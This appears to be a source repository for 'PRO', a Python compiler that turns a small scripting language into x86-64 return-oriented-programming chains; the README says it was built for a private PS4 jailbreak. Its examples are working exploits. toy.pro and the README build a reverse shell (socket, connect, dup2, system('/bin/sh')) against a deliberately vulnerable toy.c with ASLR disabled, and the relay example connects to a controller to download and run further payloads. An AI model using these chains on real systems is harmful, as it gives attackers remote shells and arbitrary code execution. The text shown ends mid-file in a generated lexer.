├── pro ├── __init__.py ├── render.py ├── parse │ ├── pro.tokens │ ├── proLexer.tokens │ ├── proErrorListener.py │ ├── pro.g4 │ ├── proVisitor.py │ ├── proLexer.py │ ├── __init__.py │ └── proParser.py ├── ropchain.py └── codegen.py ├── .gitignore ├── examples ├── relay │ ├── README.md │ ├── main.pro │ ├── loader.pro │ ├── relay.pro │ └── relay.py ├── toy │ ├── toy.c │ ├── README.md │ ├── toy.pro │ └── toy.py └── common │ ├── glibc.pro │ └── gadgets.pro ├── setup.py └── README.md /pro/__init__.py: -------------------------------------------------------------------------------- 1 | from .render import * 2 | from .parse import * 3 | from .codegen import * 4 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | .*.swp 2 | .DS_Store 3 | *.pyc 4 | peda-*.txt 5 | core 6 | .gdb_history 7 | pro.egg-info/ 8 | -------------------------------------------------------------------------------- /examples/relay/README.md: -------------------------------------------------------------------------------- 1 | setup the same environment with `toy` 2 | 3 | generate a rop loader and send to the victim program 4 | 5 | ```shell 6 | python relay.py 7 | ../toy/toy < ./loader 8 | ``` 9 | 10 | then edit the `main.pro` to rop interactively 11 | -------------------------------------------------------------------------------- /examples/toy/toy.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #define SIZE 0x4000 6 | 7 | int main() 8 | { 9 | char *ropbuf = malloc(SIZE); 10 | read(0, ropbuf, SIZE); 11 | asm volatile ("mov %0, %%rsp\nret\n"::"m"(ropbuf)); 12 | } 13 | -------------------------------------------------------------------------------- /examples/relay/main.pro: -------------------------------------------------------------------------------- 1 | main { 2 | {% include "gadgets.pro" %} 3 | {% include "glibc.pro" %} 4 | printf("this is main!\n"); 5 | printf("this is main again!\n"); 6 | nop(); // stack alignment is fixed automatically 7 | printf("this is main again and again!\n"); 8 | // put relay in the end of main 9 | {% include "relay.pro" %} 10 | printf("bye\n"); 11 | exit(0); 12 | } 13 | -------------------------------------------------------------------------------- /examples/toy/README.md: -------------------------------------------------------------------------------- 1 | setup the environment (Ubuntu 16.04) 2 | ```shell 3 | gcc toy.c -o toy 4 | ulimit -s unlimited 5 | echo 0 > /proc/sys/kernel/randomize_va_space 6 | ``` 7 | 8 | listen to port 0x4141 9 | ```shell 10 | nc -lvv 16705 11 | ``` 12 | 13 | generate the rop chain and send to the victim program 14 | ```shell 15 | python toy.py | ./toy 16 | ``` 17 | 18 | now you should have got a shell 19 | -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | import os 2 | from setuptools import setup 3 | 4 | # quick and dirty build for antlr 5 | os.system('which antlr4 && cd pro/parse && antlr4 -no-listener -visitor -Dlanguage=Python2 pro.g4') 6 | 7 | setup( 8 | name='pro', 9 | version='1.0', 10 | description='PROgramming ROP like a PRO', 11 | packages=['pro', 'pro.parse'], 12 | install_requires=[ 13 | 'jinja2', 14 | 'antlr4-python2-runtime', 15 | ], 16 | ) 17 | -------------------------------------------------------------------------------- /examples/relay/loader.pro: -------------------------------------------------------------------------------- 1 | relay { 2 | {% include "gadgets.pro" %} 3 | {% include "glibc.pro" %} 4 | // setup connection 5 | var ropserver; 6 | socket(AF_INET, SOCK_STREAM, 0); 7 | store_rdx_rax(&ropserver, undefined); 8 | array sock[{{ sockaddr(RELAY_HOST, RELAY_PORT) }}]; 9 | connect(ropserver, sock, 0x10) 10 | 11 | dprintf(ropserver, "hello, you are %d\n", ropserver); 12 | 13 | {% set RELAY_FD = 'ropserver' %} 14 | {% include "relay.pro" %} 15 | exit(0); 16 | } 17 | -------------------------------------------------------------------------------- /examples/toy/toy.pro: -------------------------------------------------------------------------------- 1 | toy { 2 | {% include "gadgets.pro" %} 3 | {% include "glibc.pro" %} 4 | var fd; 5 | socket(AF_INET, SOCK_STREAM, IPPROTO_IP); 6 | // avoid clobbering rax by setting the argument to `undefined` 7 | store_rdx_rax(&fd, undefined); 8 | printf("socket fd = %d\n", fd); 9 | array addr["\x02\x00\x41\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"]; 10 | connect(fd, addr, 0x10); 11 | {% for i in range(3): %} 12 | dup2(fd, {{i}}); 13 | {% endfor %} 14 | system("/bin/sh"); 15 | exit(1); 16 | } 17 | -------------------------------------------------------------------------------- /pro/render.py: -------------------------------------------------------------------------------- 1 | import os 2 | import jinja2 3 | 4 | def process(raw, path=[], **ctx): 5 | path.append('.') 6 | env = jinja2.Environment(loader=jinja2.FileSystemLoader(path), 7 | line_comment_prefix='//', comment_start_string='/*', 8 | comment_end_string='*/') 9 | template = env.from_string(raw) 10 | ctx.update(__builtins__) 11 | return template.render(MODULES=set(), **ctx) 12 | 13 | def process_file(script, path=[], **ctx): 14 | script_path = os.path.dirname(os.path.realpath(script)) 15 | path.append(script_path) 16 | with open(script) as f: 17 | return process(f.read(), path, **ctx) 18 | -------------------------------------------------------------------------------- /pro/parse/pro.tokens: -------------------------------------------------------------------------------- 1 | T__0=1 2 | T__1=2 3 | T__2=3 4 | T__3=4 5 | T__4=5 6 | T__5=6 7 | T__6=7 8 | T__7=8 9 | T__8=9 10 | T__9=10 11 | T__10=11 12 | T__11=12 13 | T__12=13 14 | T__13=14 15 | T__14=15 16 | T__15=16 17 | T__16=17 18 | T__17=18 19 | T__18=19 20 | T__19=20 21 | T__20=21 22 | T__21=22 23 | Identifier=23 24 | Constant=24 25 | Decimal=25 26 | Hexadecimal=26 27 | String=27 28 | Whitespace=28 29 | LineComment=29 30 | BlockComment=30 31 | '{'=1 32 | '}'=2 33 | ';'=3 34 | '\n'=4 35 | 'var'=5 36 | 'const'=6 37 | 'array'=7 38 | 'func'=8 39 | '('=9 40 | ')'=10 41 | '['=11 42 | ']'=12 43 | '<'=13 44 | ','=14 45 | '>'=15 46 | '+'=16 47 | '-'=17 48 | '*'=18 49 | '/'=19 50 | '^'=20 51 | '|'=21 52 | '&'=22 53 | -------------------------------------------------------------------------------- /pro/parse/proLexer.tokens: -------------------------------------------------------------------------------- 1 | T__0=1 2 | T__1=2 3 | T__2=3 4 | T__3=4 5 | T__4=5 6 | T__5=6 7 | T__6=7 8 | T__7=8 9 | T__8=9 10 | T__9=10 11 | T__10=11 12 | T__11=12 13 | T__12=13 14 | T__13=14 15 | T__14=15 16 | T__15=16 17 | T__16=17 18 | T__17=18 19 | T__18=19 20 | T__19=20 21 | T__20=21 22 | T__21=22 23 | Identifier=23 24 | Constant=24 25 | Decimal=25 26 | Hexadecimal=26 27 | String=27 28 | Whitespace=28 29 | LineComment=29 30 | BlockComment=30 31 | '{'=1 32 | '}'=2 33 | ';'=3 34 | '\n'=4 35 | 'var'=5 36 | 'const'=6 37 | 'array'=7 38 | 'func'=8 39 | '('=9 40 | ')'=10 41 | '['=11 42 | ']'=12 43 | '<'=13 44 | ','=14 45 | '>'=15 46 | '+'=16 47 | '-'=17 48 | '*'=18 49 | '/'=19 50 | '^'=20 51 | '|'=21 52 | '&'=22 53 | -------------------------------------------------------------------------------- /pro/parse/proErrorListener.py: -------------------------------------------------------------------------------- 1 | import antlr4 2 | import sys 3 | 4 | class SyntaxError(Exception): 5 | pass 6 | 7 | class proErrorListener(antlr4.error.ErrorListener.ErrorListener): 8 | def __init__(self, src): 9 | super(proErrorListener, self).__init__() 10 | 11 | self.src = src 12 | 13 | def syntaxError(self, recognizer, offendingSymbol, line, column, msg, e): 14 | lines = self.src.split('\n') 15 | text = '' 16 | for i in xrange(line - 10, line + 10): 17 | if i >= 0 and i < len(lines): 18 | h = '+ ' if i != line else '> ' 19 | text += '%d: %s %s\n' % (i, h, lines[i]) 20 | sys.stderr.write(text) 21 | raise SyntaxError(msg) 22 | -------------------------------------------------------------------------------- /examples/relay/relay.pro: -------------------------------------------------------------------------------- 1 | {% include "gadgets.pro" %} 2 | {% include "glibc.pro" %} 3 | 4 | // tell the server to start 5 | write({{RELAY_FD}}, "START", 5); 6 | 7 | // read length of rop 8 | var roplen; 9 | read({{RELAY_FD}}, &roplen, 8); 10 | // dprintf({{RELAY_FD}}, "rop length = %x\n", roplen); 11 | 12 | // setup memory for rop 13 | var pivot; 14 | var ropbuf; 15 | mmap(0, roplen, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0); 16 | store_rdx_rax(&ropbuf, undefined); 17 | // dprintf({{RELAY_FD}}, "rop buffer = %p\n", ropbuf); 18 | write({{RELAY_FD}}, &ropbuf, 8); 19 | 20 | // read payload of rop 21 | read({{RELAY_FD}}, ropbuf, roplen); 22 | 23 | nop(); 24 | // stack pivoting 25 | store_rdx_rax(&pivot, set_rsp); 26 | inline(set_rsp, &pivot); // tricky: pivot twice 27 | -------------------------------------------------------------------------------- /examples/toy/toy.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import pro 3 | 4 | class MyCodeGen(pro.CodeGenAmd64): 5 | def store_reg_mem(self, reg, addr): 6 | if reg == 'rax': 7 | store_rdx_rax = self.prog.env['store_rdx_rax'] 8 | r = self.set_reg_imm('rdx', addr) 9 | r.append(store_rdx_rax) 10 | r.define |= {'rdx'} 11 | return r 12 | raise NotImplemented('store_reg_mem %s' % reg) 13 | 14 | if __name__ == '__main__': 15 | rendered = pro.process_file('toy.pro', path=['../common'], LIBC_VERSION='2.23') 16 | 17 | prog = pro.parse(rendered) 18 | 19 | gen = MyCodeGen(prog) 20 | libc_base = 0x00002aaaaacd3000 # 16.04 21 | # libc_base = 0x00002aaaaacd1000 # 15.10 22 | reloc = {'libc':libc_base, '_CODE':0x602010} # derandomized 23 | chain = gen.gen_chain(reloc) 24 | 25 | sys.stdout.write(chain) 26 | -------------------------------------------------------------------------------- /examples/common/glibc.pro: -------------------------------------------------------------------------------- 1 | {% if str(self) not in MODULES %} 2 | # {{self if MODULES.add(str(self)) else self}} 3 | const AF_INET(2) 4 | const SOCK_STREAM(1) 5 | const IPPROTO_IP(0) 6 | 7 | const PROT_NONE(0x0) 8 | const PROT_READ(0x1) 9 | const PROT_WRITE(0x2) 10 | const PROT_EXEC(0x4) 11 | const MAP_ANON(0x20) // linux 12 | const MAP_SHARED(0x1) 13 | const MAP_FIXED(0x10) 14 | const MAP_PRIVATE(0x2) 15 | 16 | {% if LIBC_VERSION == '2.23' %} 17 | 18 | func mmap 19 | func system 20 | func socket 21 | func connect 22 | func dup2 23 | func printf 24 | func exit 25 | func perror 26 | func dprintf 27 | func read 28 | func write 29 | 30 | {% elif LIBC_VERSION == '2.21' %} 31 | 32 | func mmap 33 | func system 34 | func socket 35 | func connect 36 | func dup2 37 | func printf 38 | func exit 39 | func perror 40 | func dprintf 41 | func read 42 | func write 43 | 44 | {% endif %} 45 | {% endif %} 46 | -------------------------------------------------------------------------------- /examples/common/gadgets.pro: -------------------------------------------------------------------------------- 1 | {% if str(self) not in MODULES %} 2 | # {{self if MODULES.add(str(self)) else self}} 3 | {% if LIBC_VERSION == '2.23' %} 4 | 5 | func nop ; 6 | 7 | func set_rax ; 8 | func set_rdi ; 9 | func set_rsi ; 10 | func set_rdx ; 11 | func set_rcx ; 12 | func set_r8 ; // pop r8 ; mov eax, 0x00000001 ; ret ; 13 | func set_r14 ; 14 | func set_rbx ; 15 | func set_rsp ; 16 | 17 | func store_rdx_rax ; 18 | func load_rax ; 19 | func mov_r9_r14_call_rbx ; 20 | 21 | {% elif LIBC_VERSION == '2.21' %} 22 | 23 | func nop ; 24 | 25 | func set_rax ; 26 | func set_rdi ; 27 | func set_rsi ; 28 | func set_rdx ; 29 | func set_rcx ; 30 | func set_r8 ; // pop r8 ; mov eax, 0x00000001 ; ret ; 31 | func set_r14 ; 32 | func set_r15 ; 33 | func set_rbx ; 34 | func set_rsp ; 35 | func set_rbp ; 36 | 37 | func store_rdx_rax ; 38 | func load_rax ; 39 | func mov_r9_r15_call_rbx ; 40 | 41 | {% endif %} 42 | {% endif %} 43 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PRO: PROgramming ROP like a PRO 2 | 3 | This is a crappy tool used in our private PS4 jailbreak. Since some version, the internal browser is compiled WITHOUT jit support, and sys\_jitshm\_xxx seems to be disabled for unprivileged process. We have to write the kernel exploitation in ROP, like what has been done in HENKaku jailbreak. 4 | 5 | ## Build 6 | 7 | ```shell 8 | pip install git+https://github.com/chaitin/pro 9 | ``` 10 | 11 | If you have modified the `pro.g4` file, use the following commands to 12 | generate new lexer and parser. 13 | 14 | ```shell 15 | cd pro/parse && antlr4 -no-listener -visitor -Dlanguage=Python2 pro.g4 16 | ``` 17 | 18 | ## Examples 19 | 20 | ```javascript 21 | toy { 22 | {% include "gadgets.pro" %} 23 | {% include "glibc.pro" %} 24 | const AF_INET(2); 25 | const SOCK_STREAM(1); 26 | const IPPROTO_IP(0); 27 | var fd; 28 | socket(AF_INET, SOCK_STREAM, IPPROTO_IP); 29 | func store_rdx_rax; 30 | store_rdx_rax(&fd, undefined); 31 | printf("socket fd = %d\n", fd); 32 | array addr["\x02\x00\x41\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"]; 33 | connect(fd, addr, 0x10); 34 | {% for i in range(3): %} 35 | dup2(fd, {{i}}); 36 | {% endfor %} 37 | system("/bin/sh"); 38 | exit(1); 39 | } 40 | 41 | ``` 42 | 43 | ## Usage 44 | 45 | A BIG TODO. Just try and learn by yourself. 46 | 47 | ## Quick Guide 48 | 49 | All expressions should be evaluated during compilation, Const/Func should 50 | be initialized in declaration. 51 | 52 | Func is initialized with . Base/Offset is used for 53 | relocation, Signature determines the calling convention of Func. 54 | 55 | Array can be declared with size(Int) or directly initialized with its content(String). 56 | 57 | For loop should be written in template script, it will be rendered 58 | before compilation. For more information, check 59 | [Jinja2](http://jinja.pocoo.org/). 60 | 61 | -------------------------------------------------------------------------------- /pro/parse/pro.g4: -------------------------------------------------------------------------------- 1 | grammar pro; 2 | 3 | program 4 | : Identifier '{' statement* '}' 5 | ; 6 | 7 | statement 8 | : call_statement 9 | | declaration 10 | | delimiter 11 | ; 12 | 13 | delimiter 14 | : ';' 15 | | '\n' 16 | ; 17 | 18 | declaration 19 | : type_specifier Identifier initializer? 20 | ; 21 | 22 | type_specifier 23 | : 'var' 24 | | 'const' 25 | | 'array' 26 | | 'func' 27 | ; 28 | 29 | initializer 30 | : expression_initializer 31 | | array_initializer 32 | | func_initializer 33 | ; 34 | 35 | expression_initializer 36 | : '(' expression ')' 37 | ; 38 | 39 | array_initializer 40 | : '[' expression ']' 41 | ; 42 | 43 | func_initializer 44 | : '<' Identifier (',' Constant (',' String)?)? '>' 45 | ; 46 | 47 | call_statement 48 | : Identifier '(' arguments? ')' 49 | ; 50 | 51 | arguments 52 | : expression 53 | | arguments ',' expression 54 | ; 55 | 56 | expression 57 | : primary_expression 58 | | binary_expression 59 | | unary_expression 60 | ; 61 | 62 | binary_expression 63 | : primary_expression binary_operator primary_expression 64 | ; 65 | 66 | unary_expression 67 | : unary_operator primary_expression 68 | ; 69 | 70 | binary_operator 71 | : '+' 72 | | '-' 73 | | '*' 74 | | '/' 75 | | '^' 76 | | '|' 77 | | '&' 78 | ; 79 | 80 | unary_operator 81 | : '&' 82 | ; 83 | 84 | primary_expression 85 | : Identifier 86 | | Constant 87 | | String 88 | | '(' expression ')' 89 | ; 90 | 91 | Identifier 92 | : Nondigit (Nondigit | Digit)* 93 | ; 94 | 95 | Constant 96 | : Decimal 97 | | Hexadecimal 98 | ; 99 | 100 | Decimal 101 | : '-'? Digit+ 102 | ; 103 | 104 | Hexadecimal 105 | : '-'? '0' ('x' | 'X') Hexdigit+ 106 | ; 107 | 108 | String 109 | : '"' Char_sequence? '"' 110 | ; 111 | 112 | fragment 113 | Char_sequence 114 | : Char+ 115 | ; 116 | 117 | fragment 118 | Char 119 | : ~["\\] 120 | | Escape_sequence 121 | ; 122 | 123 | fragment 124 | Nondigit 125 | : [a-zA-Z_] 126 | ; 127 | 128 | fragment 129 | Digit 130 | : [0-9] 131 | ; 132 | 133 | fragment 134 | Hexdigit 135 | : [0-9a-fA-F] 136 | ; 137 | 138 | fragment 139 | Escape_sequence 140 | : '\\' ["n\\] 141 | | '\\x' Hexdigit+ 142 | ; 143 | 144 | Whitespace 145 | : [ \t]+ 146 | -> skip 147 | ; 148 | 149 | LineComment 150 | : ('//' | '#') ~[\r\n]* 151 | -> skip 152 | ; 153 | 154 | BlockComment 155 | : '/*' .*? '*/' 156 | -> skip 157 | ; 158 | -------------------------------------------------------------------------------- /pro/parse/proVisitor.py: -------------------------------------------------------------------------------- 1 | # Generated from pro.g4 by ANTLR 4.5.2 2 | from antlr4 import * 3 | 4 | # This class defines a complete generic visitor for a parse tree produced by proParser. 5 | 6 | class proVisitor(ParseTreeVisitor): 7 | 8 | # Visit a parse tree produced by proParser#program. 9 | def visitProgram(self, ctx): 10 | return self.visitChildren(ctx) 11 | 12 | 13 | # Visit a parse tree produced by proParser#statement. 14 | def visitStatement(self, ctx): 15 | return self.visitChildren(ctx) 16 | 17 | 18 | # Visit a parse tree produced by proParser#delimiter. 19 | def visitDelimiter(self, ctx): 20 | return self.visitChildren(ctx) 21 | 22 | 23 | # Visit a parse tree produced by proParser#declaration. 24 | def visitDeclaration(self, ctx): 25 | return self.visitChildren(ctx) 26 | 27 | 28 | # Visit a parse tree produced by proParser#type_specifier. 29 | def visitType_specifier(self, ctx): 30 | return self.visitChildren(ctx) 31 | 32 | 33 | # Visit a parse tree produced by proParser#initializer. 34 | def visitInitializer(self, ctx): 35 | return self.visitChildren(ctx) 36 | 37 | 38 | # Visit a parse tree produced by proParser#expression_initializer. 39 | def visitExpression_initializer(self, ctx): 40 | return self.visitChildren(ctx) 41 | 42 | 43 | # Visit a parse tree produced by proParser#array_initializer. 44 | def visitArray_initializer(self, ctx): 45 | return self.visitChildren(ctx) 46 | 47 | 48 | # Visit a parse tree produced by proParser#func_initializer. 49 | def visitFunc_initializer(self, ctx): 50 | return self.visitChildren(ctx) 51 | 52 | 53 | # Visit a parse tree produced by proParser#call_statement. 54 | def visitCall_statement(self, ctx): 55 | return self.visitChildren(ctx) 56 | 57 | 58 | # Visit a parse tree produced by proParser#arguments. 59 | def visitArguments(self, ctx): 60 | return self.visitChildren(ctx) 61 | 62 | 63 | # Visit a parse tree produced by proParser#expression. 64 | def visitExpression(self, ctx): 65 | return self.visitChildren(ctx) 66 | 67 | 68 | # Visit a parse tree produced by proParser#binary_expression. 69 | def visitBinary_expression(self, ctx): 70 | return self.visitChildren(ctx) 71 | 72 | 73 | # Visit a parse tree produced by proParser#unary_expression. 74 | def visitUnary_expression(self, ctx): 75 | return self.visitChildren(ctx) 76 | 77 | 78 | # Visit a parse tree produced by proParser#binary_operator. 79 | def visitBinary_operator(self, ctx): 80 | return self.visitChildren(ctx) 81 | 82 | 83 | # Visit a parse tree produced by proParser#unary_operator. 84 | def visitUnary_operator(self, ctx): 85 | return self.visitChildren(ctx) 86 | 87 | 88 | # Visit a parse tree produced by proParser#primary_expression. 89 | def visitPrimary_expression(self, ctx): 90 | return self.visitChildren(ctx) 91 | 92 | 93 | -------------------------------------------------------------------------------- /pro/ropchain.py: -------------------------------------------------------------------------------- 1 | from collections import defaultdict 2 | 3 | from .parse import Address 4 | 5 | class RopChainError(Exception): 6 | pass 7 | 8 | class Marker(object): 9 | pass 10 | 11 | class RopChain(list): 12 | def __init__(self, *args): 13 | super(RopChain, self).__init__(*args) 14 | 15 | self.define = set() 16 | self.reserve = set() 17 | 18 | def __add__(self, other): 19 | return RopChunk([self, other]) 20 | 21 | def fix(self): 22 | ''' try to resolve Marker ''' 23 | for i in xrange(len(self)): 24 | if isinstance(self[i], Marker): 25 | for j in xrange(len(self)): 26 | if self[j] == id(self[i]): 27 | # find match 28 | self[i] = Address('self', j * 8) 29 | break 30 | 31 | def final(self): 32 | ''' rebase `self` to `code` ''' 33 | self.fix() 34 | for g in self: 35 | if isinstance(g, Marker): 36 | raise RopChainError('unresolved marker') 37 | elif isinstance(g, Address) and g.base == 'self': 38 | g.base = '_CODE' 39 | return self 40 | 41 | def extends(self, other): 42 | ''' concat with another RopChain and rebase it''' 43 | offset = len(self) * 8 44 | other.fix() 45 | for i in xrange(len(other)): 46 | o = other[i] 47 | if isinstance(o, Address) and o.base == 'self': 48 | o.offset += offset 49 | self.append(o) 50 | 51 | if 'all' in other.define: 52 | self.define = {'all'} 53 | else: 54 | self.define |= other.define 55 | 56 | if 'all' in other.reserve: 57 | self.reserve = {'all'} 58 | else: 59 | self.reserve |= other.reserve 60 | 61 | return self 62 | 63 | @property 64 | def size(self): 65 | return len(self) * 8 66 | 67 | class RopChunk(list): 68 | def compact(self): 69 | n = len(self) 70 | D = [0] * n 71 | M = defaultdict(set) 72 | for i in xrange(n): 73 | u = self[i] 74 | for j in xrange(n): 75 | if i == j: 76 | continue 77 | v = self[j] 78 | if (u.define & v.reserve) or ('all' in v.reserve): 79 | # u should be in front of v 80 | M[i].add(j) 81 | D[j] += 1 82 | 83 | compacted = RopChain() 84 | 85 | for i in xrange(n): 86 | try: 87 | u = D.index(0) 88 | D[u] = -1 89 | except ValueError: 90 | raise RopChainError('failed to build ropchain') 91 | 92 | compacted.extends(self[u]) 93 | 94 | for v in M[u]: 95 | D[v] -= 1 96 | 97 | compacted.fix() 98 | compacted.define = set() 99 | compacted.reserve = set() 100 | 101 | return compacted 102 | 103 | @property 104 | def size(): 105 | return sum((x.size for x in self)) 106 | -------------------------------------------------------------------------------- /examples/relay/relay.py: -------------------------------------------------------------------------------- 1 | import pro 2 | 3 | import struct 4 | import pwn 5 | 6 | def sockaddr(host, port, family=2): 7 | raw = struct.pack('H', port) + ''.join(map(chr, map(int, host.split('.')))) + '\x00' * 8 8 | return '"' + raw.encode('string-escape') + '"' 9 | 10 | class MyCodeGen(pro.CodeGenAmd64): 11 | def store_reg_mem(self, reg, addr): 12 | if reg == 'rax': 13 | store_rdx_rax = self.prog.env['store_rdx_rax'] 14 | r = self.set_reg_imm('rdx', addr) 15 | r.append(store_rdx_rax) 16 | r.define |= {'rdx'} 17 | return r 18 | raise NotImplemented('store_reg_mem %s' % reg) 19 | 20 | def set_reg_imm(self, reg, imm): 21 | if reg == 'r9': 22 | if 'mov_r9_r14_call_rbx' in self.prog.env: 23 | mov_r9_r14_call_rbx = self.prog.env['mov_r9_r14_call_rbx'] 24 | set_rbx = self.prog.env['set_rbx'] 25 | return self.gen_call(pro.Call(mov_r9_r14_call_rbx, [imm, set_rbx])) 26 | elif 'mov_r9_r15_call_rbx' in self.prog.env: 27 | mov_r9_r15_call_rbx = self.prog.env['mov_r9_r15_call_rbx'] 28 | set_rbx = self.prog.env['set_rbx'] 29 | return self.gen_call(pro.Call(mov_r9_r15_call_rbx, [imm, set_rbx])) 30 | return super(MyCodeGen, self).set_reg_imm(reg, imm) 31 | 32 | def compile(script): 33 | rendered = pro.process_file(script, path=['../common'], **globals()) 34 | # print rendered 35 | prog = pro.parse(rendered) 36 | return MyCodeGen(prog) 37 | 38 | if __name__ == '__main__': 39 | # libc_base = 0x00002aaaaacd1000 # 15.10 40 | libc_base = 0x00002aaaaacd3000 # 16.04 41 | reloc = {'libc':libc_base, '_CODE':0x602010} # derandomized 42 | 43 | # LIBC_VERSION = '2.21' 44 | LIBC_VERSION = '2.23' 45 | RELAY_HOST = '127.0.0.1' 46 | RELAY_PORT = 12345 47 | listener = pwn.tubes.listen.listen(RELAY_PORT) 48 | 49 | with open('loader', 'w') as payload: 50 | chain = compile('loader.pro').gen_chain(reloc) 51 | payload.write(chain) 52 | 53 | # reserve for stack usage 54 | reserve = 0x400 55 | 56 | r = listener.wait_for_connection() 57 | d = r.recvline().strip() 58 | RELAY_FD = int(d.split(' ')[-1]) 59 | print 'relay fd = %d' % RELAY_FD 60 | 61 | while True: 62 | pwn.context.log_level = 'DEBUG' 63 | try: 64 | r.recvuntil('START') 65 | except EOFError: 66 | break 67 | 68 | pwn.context.log_level = 'INFO' 69 | raw_input('GO') 70 | 71 | x = compile('main.pro') 72 | 73 | # calculate rop size in a dry run 74 | rop = x.gen_chain(reloc) 75 | ropsize = len(rop) 76 | ropsize += reserve 77 | print 'length of next rop = %#x' % ropsize 78 | 79 | r.send(struct.pack('= 0 and (offset + v.size) <= env.size): 54 | raise CodeGenError('inconsitent variable size') 55 | for i in xrange(v.size / 8): 56 | data[offset / 8 + i] = val[i] 57 | return data 58 | 59 | def gen_code(self, statements): 60 | chain = RopChain() 61 | for stmt in statements: 62 | c = self.gen_call(stmt) 63 | c.define = set() 64 | c.reserve = set() 65 | chain.extends(c) 66 | return chain.final() 67 | 68 | def concretize(self, chain, reloc=None): 69 | # adjust function call which requires stack alignment 70 | for i in xrange(len(chain)): 71 | if isinstance(chain[i], Func) and chain[i].align: 72 | if not '_CODE' in reloc: 73 | raise CodeGenError('base of .code is required for stack aligment') 74 | if (reloc['_CODE'] + i * 8) % 0x10 == 0: 75 | # no need for alignment 76 | continue 77 | nop = self.prog.env['nop'] 78 | if chain[i + 1] != nop: 79 | raise CodeGenError('no nop for stack alignment') 80 | # swap their order 81 | chain[i + 1] = chain[i] 82 | chain[i] = nop 83 | 84 | return map(lambda x:self._concretize(x, reloc), chain) 85 | 86 | def flatten(self, chain, reloc=None): 87 | return ''.join(map(lambda x: struct.pack(' 6: 187 | raise CodeGenError('only support 6 arguments') 188 | reg = ['rdi', 'rsi', 'rdx', 'rcx', 'r8', 'r9'][k] 189 | r = self.set_reg(reg, arg) 190 | r.reserve = {reg} 191 | return r 192 | 193 | def gen_call_epilog(self, argc): 194 | return RopChain() 195 | 196 | def set_reg_imm(self, reg, imm): 197 | reg_setter = 'set_' + reg 198 | if reg_setter not in self.prog.env: 199 | raise CodeGenError('gadget "%s" is required' % reg_setter) 200 | gadget = self.prog.env[reg_setter] 201 | r = RopChain([gadget, imm]) 202 | if gadget.clobber is not None: 203 | r.define |= set(gadget.clobber) 204 | if gadget.output is not None: 205 | r.define |= set(gadget.clobber) 206 | return r 207 | 208 | def load_reg_mem(self, reg, addr): 209 | # XXX load registers by RAX 210 | if reg == 'rax': 211 | load_rax = self.prog.env['load_rax'] # mov rax, qword ptr [rax] 212 | r = self.set_reg_imm(reg, addr) 213 | r.append(load_rax) 214 | r.define = {'rax'} 215 | return r 216 | else: 217 | dst = Marker() 218 | r = self.ptrcpy(dst, addr).extends(self.set_reg_imm(reg, id(dst))) 219 | return r 220 | 221 | def store_reg_mem(self, reg, addr): 222 | # XXX store registers in RAX 223 | if reg == 'rax': 224 | store_rdi_rax = self.prog.env['store_rdi_rax'] # mov qword ptr [rdi], rax 225 | r = self.set_reg_imm('rdi', addr) 226 | r.append(store_rdi_rax) 227 | r.define |= {'rdi'} # rdi is overwritten 228 | return r 229 | raise NotImplementedError('store_reg_mem %s' % reg) 230 | 231 | def ptrcpy(self, dest, src): 232 | r = self.load_reg_mem('rax', src).extends(self.store_reg_mem('rax', dest)) 233 | return r 234 | -------------------------------------------------------------------------------- /pro/parse/proLexer.py: -------------------------------------------------------------------------------- 1 | # Generated from pro.g4 by ANTLR 4.5.2 2 | # encoding: utf-8 3 | from __future__ import print_function 4 | from antlr4 import * 5 | from io import StringIO 6 | 7 | 8 | def serializedATN(): 9 | with StringIO() as buf: 10 | buf.write(u"\3\u0430\ud6d1\u8206\uad2d\u4417\uaef1\u8d80\uaadd\2") 11 | buf.write(u" \u00e5\b\1\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4") 12 | buf.write(u"\7\t\7\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r") 13 | buf.write(u"\t\r\4\16\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22") 14 | buf.write(u"\4\23\t\23\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27\4") 15 | buf.write(u"\30\t\30\4\31\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35") 16 | buf.write(u"\t\35\4\36\t\36\4\37\t\37\4 \t \4!\t!\4\"\t\"\4#\t#\4") 17 | buf.write(u"$\t$\4%\t%\3\2\3\2\3\3\3\3\3\4\3\4\3\5\3\5\3\6\3\6\3") 18 | buf.write(u"\6\3\6\3\7\3\7\3\7\3\7\3\7\3\7\3\b\3\b\3\b\3\b\3\b\3") 19 | buf.write(u"\b\3\t\3\t\3\t\3\t\3\t\3\n\3\n\3\13\3\13\3\f\3\f\3\r") 20 | buf.write(u"\3\r\3\16\3\16\3\17\3\17\3\20\3\20\3\21\3\21\3\22\3\22") 21 | buf.write(u"\3\23\3\23\3\24\3\24\3\25\3\25\3\26\3\26\3\27\3\27\3") 22 | buf.write(u"\30\3\30\3\30\7\30\u0088\n\30\f\30\16\30\u008b\13\30") 23 | buf.write(u"\3\31\3\31\5\31\u008f\n\31\3\32\5\32\u0092\n\32\3\32") 24 | buf.write(u"\6\32\u0095\n\32\r\32\16\32\u0096\3\33\5\33\u009a\n\33") 25 | buf.write(u"\3\33\3\33\3\33\6\33\u009f\n\33\r\33\16\33\u00a0\3\34") 26 | buf.write(u"\3\34\5\34\u00a5\n\34\3\34\3\34\3\35\6\35\u00aa\n\35") 27 | buf.write(u"\r\35\16\35\u00ab\3\36\3\36\5\36\u00b0\n\36\3\37\3\37") 28 | buf.write(u"\3 \3 \3!\3!\3\"\3\"\3\"\3\"\3\"\3\"\6\"\u00be\n\"\r") 29 | buf.write(u"\"\16\"\u00bf\5\"\u00c2\n\"\3#\6#\u00c5\n#\r#\16#\u00c6") 30 | buf.write(u"\3#\3#\3$\3$\3$\5$\u00ce\n$\3$\7$\u00d1\n$\f$\16$\u00d4") 31 | buf.write(u"\13$\3$\3$\3%\3%\3%\3%\7%\u00dc\n%\f%\16%\u00df\13%\3") 32 | 